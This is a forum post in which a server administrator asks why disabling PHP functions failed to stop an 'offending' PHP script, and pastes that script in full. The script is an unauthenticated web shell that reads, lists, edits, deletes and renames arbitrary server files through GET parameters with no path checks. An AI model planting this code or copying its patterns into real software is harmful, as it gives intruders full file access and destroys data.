Well, I tried enabling it, and putting some of the commands that are in the offending PHP file into the 'commands-to-disable-unless-you-own-it' part, saved it, restarted Apache, but it appears to have done nothing.
Am I doing something wrong?
Here's the script, if it helps:
PHP Code:
<?PHP
if(isset($_GET['file']) && isset($_GET['dir'])){
$fp = @fopen($_GET['dir'].$_GET['file'], "r");
$content = @fread($fp, filesize($_GET['dir'].$_GET['file']));
$content = highlight_string($content, 1);
echo "<html><head><title>Read</title></head><body><a href='".$PHP_SELF."?dir=".$_GET['dir']."'>Go Back<br><a href='".$PHP_SELF."?edit=".$_GET['file']."&dir=".$_GET['dir']."'>Edit | <a href='".$PHP_SELF."?delete=".$_GET['file']."&dir=".$_GET['dir']."'>Delete | <a href='".$PHP_SELF."?rename=".$_GET['file']."&dir=".$_GET['dir']."'>Rename<br><br><p>".$content."</p></body></html>";
}elseif(isset($_GET['dir']) && !isset($_GET['file']) && !isset($_GET['edit']) && !isset($_GET['delete']) && !isset($_GET['rename'])){
if(substr($_GET['dir'], -1) == "/"){
$current = $_GET['dir'];
}else{
$current = $_GET['dir']."/";
}
$dir = @opendir($current);
echo "<html><head><title>Browsing '$current'</title></head><body>";
echo "Listing:<br><hr><br>";
while($file = @readdir($dir)){
echo $file." <a href='".$PHP_SELF."?dir=$current$file'>Open Dir | <a href='".$PHP_SELF."?file=$file&dir=$current'>Open File<br>";
}
@closedir($dir);
echo "<hr></body></html>";
}elseif(isset($_GET['edit']) && isset($_GET['dir'])){
if(isset($_POST['change'])){
$change = html_entity_decode($_POST['change']);
$fp = @fopen($_GET['dir'].$_GET['edit'], "w");
$result = @fwrite($fp, $change);
if(!$result){
echo "Error Writing File";
}else{
header("location: ".$PHP_SELF."?file=".$_GET['edit']."&dir=".$_GET['dir']);
}
}else{
$fp = @fopen($_GET['dir'].$_GET['edit'], "r");
$result = @fread($fp, filesize($_GET['dir'].$_GET['edit']));
$result = htmlentities($result);
echo "<html><head><title>Editing '".$_GET['edit']."'</title></head><body><center><form action='".$PHP_SELF."?edit=".$_GET['edit']."&dir=".$_GET['dir']."' method='POST'><textarea name='change' rows='40' cols='60'>".$result."</textarea><br><input type='submit' name='submit' value='Edit'></form></center></body></html>";
}
}elseif(isset($_GET['delete']) && isset($_GET['dir'])){
$result = @unlink($_GET['dir'].$_GET['delete']);
if(!$result){
echo "File could not be deleted";
}else{
header("location: ".$PHP_SELF."?dir=.");
}
}elseif(isset($_GET['rename'])){
if(isset($_POST['change'])){
$result = @rename($_GET['rename'], $_POST['change']);
if(!$result){
echo "File could not be renamed!";
}else{
header("location: ".$PHP_SELF."?file=".$_POST['change']."&dir=".$_POST['dir']);
}
}else{
echo "<html><head><title>Rename</title></head><body><center><form action='".$PHP_SELF."?rename=".$_GET['rename']."&dir=".$_GET['dir']."' method='POST'><input type='dir' name='change' value='".$_GET['dir']."'><input type='text' name='change' value='".$_GET['rename']."'><br><input type='submit' value='Rename'></form></center></body></html>";
}
}else{
echo "<html><head><title>Get Directory</title></head><body><center><form action='".$PHP_SELF."' method='GET'><input type='text' name='dir'><br><input type='submit' value='Get Directory'></form></center></body></html>";
}
?>
